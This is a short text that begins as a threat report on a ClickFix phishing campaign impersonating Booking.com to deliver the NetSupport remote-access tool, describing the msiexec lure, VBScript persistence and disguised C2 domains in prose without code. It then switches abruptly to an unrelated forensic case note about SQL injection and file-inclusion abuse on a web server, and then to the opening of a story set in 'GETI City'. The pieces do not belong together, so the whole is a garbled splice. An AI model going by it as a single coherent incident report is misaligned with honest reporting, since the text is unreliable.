ClickFix Phishing Campaign Delivering NetSupport RAT
A multi-stage attack chain leveraging fake property review portals, ClickFix social engineering, and a custom MSI dropper to establish persistent remote access via NetSupport Manager.
Executive Summary
A threat actor is operating a sophisticated phishing campaign impersonating Booking.com, directing victims to fraudulent property review portals. A ClickFix lure tricks users into executing a malicious msiexec command that downloads and installs a custom MSI dropper from attacker-controlled IP addresses. The dropper deploys a VBScript installer that extracts password-protected archives, establishes persistence via the Windows Startup folder, and launches a silently configured NetSupport Manager client, granting the attacker full remote access to compromised machines. All staging files are deleted upon completion to impede forensic investigation. Two C2 domains masquerade as CDN infrastructure to blend into normal network traffic.
Scope. A company web server was compromised via the hosted site. The team captured a forensic disk image and a live memory dump in time for offline analysis. Artifacts for this walkthrough: archive.org: dfir-case1.
Web layer. Apache access and error logs show repeated OWASP-style abuse: SQL injection (including attempted INTO OUTFILE / upload-style payloads), reflected XSS, local file inclusion / path traversal, and an IDS log-clear request consistent with covering tracks on the app.
In the heart of Golang Country stands GETI City - a metropolis where technology and ambition touch the sky…
Scene 1: The City
The winter wind howls through GETI City’s glass-and-steel canyons, carrying whispers of digital secrets between towering skyscrapers. Neon signs pierce the darkness, their glow reflecting off the frost-covered windows of Brukley Company’s cybersecurity headquarters.
